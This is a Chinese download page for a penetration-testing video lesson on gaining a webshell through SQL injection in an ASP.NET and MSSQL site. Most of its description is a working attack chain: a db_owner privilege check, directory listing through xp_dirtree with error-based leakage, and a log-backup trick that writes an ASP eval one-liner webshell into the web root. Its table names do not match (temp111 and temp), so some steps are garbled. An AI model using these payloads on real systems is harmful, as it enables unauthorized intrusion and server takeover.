您现在的位置:圣剑网 >> 动画教程 >> 漏洞检测 >> 实战渗透测试第五课:aspx+mssql数据库,db权限注入获得webshell
实战渗透测试第五课:aspx+mssql数据库,db权限注入获得webshell
软件大小:17.7 MB
更新时间:2016-10-31 02:15
授权方式:共享版
人气访问:44次
运行环境:Windows All 32/64位
软件评级:
分享好友:
实战渗透测试第五课:aspx+mssql数据库,db权限注入获得webshell介绍

讲师:巅峰邪恶

动画名称:渗透测试第五课   aspx+mssql数据库 db权限注入获得webshell


测试环境:Win7 系统


db权限下执行


想要拿到webshell就要知道绝对路径


and 1=(select is_member('db_ownet'));--     //返回正常说明日db权限


查找绝对路径


create table temp111(dir nvarchar(255),depth varchar(255),files varchar(255),ID int not null identity(1,1))


该语句可创建一个临时表,一共 4 个字段,前三个字段用于存放执行存储过程 xp_dirtree

返回的结果,ID 字段则方便查询指定内容。


然后执行如下查询:

;insert into temp(dir,depth,files)exec master.dbo.xp_dirtree 'C:\Inetpub',1,1--


利用 xp_dirtree 扩展查询,将指定目录的文件和文件夹名称插入到临时表中,这里查询

的是 c 盘目录路径


and (select dir from temp where id =1)>0

通过报错来列出盘符下的所有目录,须要改ID的值


----------------------------------------------------------------


通过数据库备份插入一句话


;alter database cimer set RECOVERY FULL   cimer当前库

;create table test(str image)

;backup log cimer to disk='c:\test' with init

;insert  into  test(str)values  ('<%eval request("admin")%>')

;backup log cimer to disk='c:\inetpub\wwwroot\'

实战渗透测试第五课:aspx+mssql数据库,db权限注入获得webshell下载地址
网友评论

关于圣剑 - 广告服务 - 招聘信息 - 友情连接 - 保护隐私权 - 意见反馈 - 帮助中心 - 联系我们

Copyright © 2016 Sjian.Net Inc. All Rights Reserved.大千网络科技有限公司 版权所有

不良信息举报中心 陕ICP备10005927号 陕公网安备61010402000003号